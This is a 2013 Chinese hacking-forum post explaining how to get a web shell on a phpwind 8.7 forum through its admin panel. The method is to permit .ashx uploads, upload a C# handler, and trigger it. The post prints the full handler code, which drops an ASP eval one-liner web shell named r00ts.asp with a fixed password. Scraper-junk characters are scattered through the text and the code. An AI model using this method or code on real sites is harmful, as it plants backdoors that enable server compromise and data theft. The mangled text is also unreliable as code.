找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2098|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小8 j7 s1 G' l; H; _: W* E- O- F  k, T
. u! s6 B7 U: e2 Y# [9 f
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
7 F8 J3 e0 I+ T+ z5 D: h/ u 3 ]2 Y+ Y" _& t0 i: X3 D1 ]
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整9 E6 v  }$ |; Q( U. \' E' N( P4 d
  S4 c. Y/ s3 \) t" N- m9 @, @
然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
' P- z1 \! u. r" o( v
4 o) T) ~: N/ H4 `打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
3 w! y7 }- g" L0 {: F
" E: P9 s3 t, O# k! ~下面是代码:- e/ K: |( {  p* @

" A. X( J6 `6 X0 j& V: A4 d; j<%@ WebHandler Language="C#"Class="Handler" %>
2 k% d* Q4 K& e1 @3 x' v+ Busing System;  s# S$ G+ k2 y2 s! C5 h2 D0 [# Q8 E
using System.Web;
/ R8 A+ }* b2 a; Q* T" y3 Gusing System.IO;
' I2 P) |5 R; \public class Handler : IHttpHandler {* S6 w8 o* C' M# q
public void ProcessRequest (HttpContext context) {0 k7 W* n% X" a% f% {
context.Response.ContentType = "text/plain";6 k! a# L4 x4 S5 f: L
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
$ S( }. B9 v( ^file1.Write("<%eval request(\"r00ts\")%>");
3 B$ v/ z$ E( }+ kfile1.Flush();* E& J! \  f' n% ^, A9 R& M
file1.Close();
& R/ v2 h1 l: V6 |8 ~}
0 x  n0 x0 A# @* Z: @. \4 Cpublic bool IsReusable {
  s# u7 [1 e# k% q/ lget {2 D6 B+ u& ?+ X
return false;' P% S' s" R0 i9 R. C% [5 [" v
}. K9 g; y: t% R+ v1 K
}
! N  e* Y- s  m. E}# j& W9 i9 w/ t0 V; u2 S; n
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表